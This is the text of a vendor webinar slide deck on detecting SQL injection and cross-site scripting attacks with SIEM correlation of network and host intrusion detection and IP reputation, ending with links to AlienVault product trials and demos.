Tom D’Aquino, Sr. SIEM Engineer

HOW TO DETECT SQL INJECTION & XSS ATTACKS USING SIEM EVENT CORRELATION

AGENDA

Todays Threat Landscape: Realities & Implications

Web Application Attacks: What are they and what harm can they bring?

Threat detection through correlation of NIDS, HIDS and IP Reputation

AlienVault Unified Security Management (USM) at a glance

Demo environment details

Live Demo of USM

Data collection and correlation from a Network IDS to detect web application attacks

Leveraging the OSSEC HIDS agent to monitor web server logs for web application attacks

More and more organizations are finding themselves in the crosshairs of various bad actors for a variety of reasons.

The number of organizations experiencing high profile breaches is unprecedented ~ SMB increasingly become the target.

THREAT LANDSCAPE: OUR NEW REALITY

Despite the

BILLIONSspent every year on IT security

>80% of organizations EXPECT to be breached every year.

~ Gartner 2012

In 2012 (and we expect this to rise in 2013 and into 2014), 50% of all targeted attacks were aimed at businesses with fewer than 2,500 employees. In fact, the largest growth area for targeted attacks in 2013 was businesses with fewer than 250 employees; 31% of all attacks targeted them.

THREAT LANDSCAPE: WEB APPLICATION ATTACKS

XSS attacks give attackers the ability to inject malicious code into websites they do not own

SQL Injection attacks allow attackers to extract information from a website such as sensitive user information or user credentials

XSS or Cross Site Scripting and SQL Injection are common methods of attacking web applications.

THREAT LANDSCAPE: CROSS SITE SCRIPTING ATTACKS

XSS attacks typically require some kind of web form that allows users to post content to the website such as:

Comment forms on blog sites

Forums, message boards, etc.

XSS attacks are easy to carry out using tools like the Browser Explotation Framework (BeEF): http://beefproject.com/

XSS attacks are typically used to compromise a user’s local system and install malware or to impersonate a user on some other website through cookie hijacking.

THREAT LANDSCAPE: CROSS SITE SCRIPTING ATTACKS (CONTINUED)

Once the script is inserted into the web page, it is automatically executed by the victim’s web browser when the web page is loaded.

THREAT LANDSCAPE: SQL INJECTION ATTACKS

User account information, i.e. email addresses and passwordsStored credit card dataSystem configuration details

SQL Injection attacks are commonly used to extract sensitive information from web applications. Examples include:

THREAT LANDSCAPE: SQL INJECTION ATTACKS (CONTINUED)

There are SQL Injection tricks that the hackers can use to find your interesting data such as viewing all of the tables in the database:

THE ALIENVAULT USM SOLUTION: NETWORK INTRUSION DETECTION

Network IDS is embedded in our platform, giving you the ability to detect network level attacks including identifying malicious web requests sent to your web server.

Network IDS signatures are updated frequently to keep you on the front lines of advanced detection

THE ALIENVAULT USM SOLUTION: HOST INTRUSION DETECTION

With Host IDS, you can monitor the logs of your IIS or Apache web server for indications of XSS and SQL Injection attacks.

Web server log monitoring

File integrity checking

Operating system logging

Centralized management

THE ALIENVAULT USM SOLUTION: IP REPUTATIONTracking activity from attackers around the world allows AlienVault USM to alert you when known bad actors are hitting your web site.

Automatically correlates known attackers with malicious activity detected from both the network and host intrusion detection systems

Figure out what is valuable

Identify ways the target could be compromised

Start looking for threats

Look for strange activity which could

indicate a threat

Piece it all together

AssetDiscovery

VulnerabilityAssessment

ThreatDetection

BehavioralMonitoring

SecurityIntelligence

Asset Discovery• Active Network Scanning• Passive Network Scanning• Asset Inventory• Host-based Software Inventory

Vulnerability Assessment• Network Vulnerability Testing

Threat Detection• Network IDS• Host IDS• Wireless IDS• File Integrity Monitoring

Behavioral Monitoring• Log Collection• Netflow Analysis• Service Availability Monitoring

Security Intelligence• SIEM Correlation• Incident Response

UNIFIED SECURITY MANAGEMENT

“Security Intelligence through Integration that we do, NOT you”

USM Platform• Bundled Products - 30 Open-Source Security tools to plug

the gaps in your existing controls• USM Framework - Configure, Manage, & Run Security

Tools. Visualize output and run reports

• USM Extension API - Support for inclusion of any other data source into the USM Framework

• Open Threat Exchange –Provides threat intelligence for collaborative defense

DEMO NETWORK DETAILS

The demo environment that we are testing in today contains the following:

NON-DEFAULT CONFIGURATION

Apache access.log monitoring is not a default behavior of the AlienVault HIDS agent

NOW FOR SOME Q&A…

Three Ways to Test Drive AlienVault

Download a Free 30-Day Trial

http://www.alienvault.com/free-trial

Try our Interactive Demo Site

http://www.alienvault.com/live-demo-site

Join us for a live Demo

http

://www.alienvault.com/marketing/alienvault-u

sm-live-

demo

Questions? [email protected]

VIEW ON-DEMAND VIDEO

To view a recorded version of this

webcast On-Demand CLICK HERE